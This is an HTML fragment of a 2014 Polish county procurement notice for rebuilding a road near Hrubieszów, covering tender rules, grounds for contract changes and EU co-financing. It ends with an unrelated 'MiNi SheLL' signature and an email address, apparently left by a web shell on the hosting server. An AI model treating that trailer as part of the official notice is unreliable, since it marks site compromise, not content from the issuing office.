<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej umowy w następujących przypadkach:
- zmiana terminu realizacji przedmiotu umowy w sytuacji:
a)  wystąpienia wydarzeń lub okoliczności uniemożliwiających wykonanie robót bądź w znaczny sposób je spowalniający tj.: niesprzyjające warunki atmosferze  (długotrwałe opady deszczu, porywiste wiatry), klęski żywiołowe (powódź, ) uniemożliwiających prawidłowe wykonywanie robót, w szczególności z powodu technologii realizacji prac określonej umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, strajk spowodowany przez osoby inne niż personel Wykonawcy;
b) ujawnienia odkryć archeologicznych wymagających przeprowadzenia badań ratowniczych:
c) ujawnienia niewybuchów i niewypałów wymagających wstrzymania robót i dokonania ich usunięcia przez specjalistyczne służby;
d) występowania (w przypadku stwierdzenia na etapie robót budowlanych) niekorzystnych warunków gruntowo - wodnych wymagających dodatkowych robót odwadniających, wymiany gruntu lub innych technologii wzmacniających podłoże gruntowe;
e) wystąpienia wad dokumentacji projektowej skutkującej koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju robót mających wpływ na termin wykonania umowy,
f) gdy z uwagi na konieczność realizacji robót dodatkowych lub zamiennych dojdzie do konieczności wstrzymania robót
g) zmian po zawarciu umowy przepisów prawa lub wprowadzenia nowych przepisów prawa lub zmiany lub wprowadzenia nowej bezwzględnie obowiązującej normy powodującej konieczność zmiany, modyfikacji lub odstępstwa w odniesieniu do wynagrodzenia,
h) wydania decyzji administracyjnych lub innych aktów władzy (decyzja władz publicznych, w tym oczekiwanie na nieprzewidziane wcześniej konieczne wyniki ekspertyz, wyrok sądu itp.) jeśli  ich wydanie nastąpiło na skutek okoliczności niezależnych od Wykonawcy lub Zamawiającego
i) gdy konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami
- zmiana osoby kierownika budowy i robót  w sytuacji:
- choroby, wypadku lub innych okoliczności powodujących brak możliwości pełnienia funkcji  W tym wypadku Wykonawca musi przedstawić na stanowisko kierownika budowy/ robót, osobę posiadającą odpowiednie ( wymagane w SIWZ) uprawnienia.
Zmiana umowy w zakresie wynagrodzenia - w przypadku ustawowej zmiany stawki podatku VAT. 
Zmiana przewidziana w umowie może być inicjowana przez Zamawiającego jak i przez Wykonawcę. Wszelkie zmiany i uzupełniania umowy wymagają uprzedniej akceptacji Stron  i formy pisemnego aneksu do umowy, pod rygorem nieważności, muszą być dokonane przez
umocowanych do tego przedstawicieli obu Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Hrubieszowie
ul. Narutowicza 34
22-500 Hrubieszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2014 godzina 08:00, miejsce: Starostwo Powiatowe w Hrubieszowie
ul. Narutowicza 34
22-500 Hrubieszów
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, iż zadanie jest realizowane w ramach projektu pn. Poprawa dostępności i jakości przygranicznej infrastruktury drogowej Etap II - przebudowa II odcinka drogi powiatowej Nr 3432L Hrubieszów-Kryłów-Dołhobyczów-Granica Państwa oraz remont drogi w Uhrynowie współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com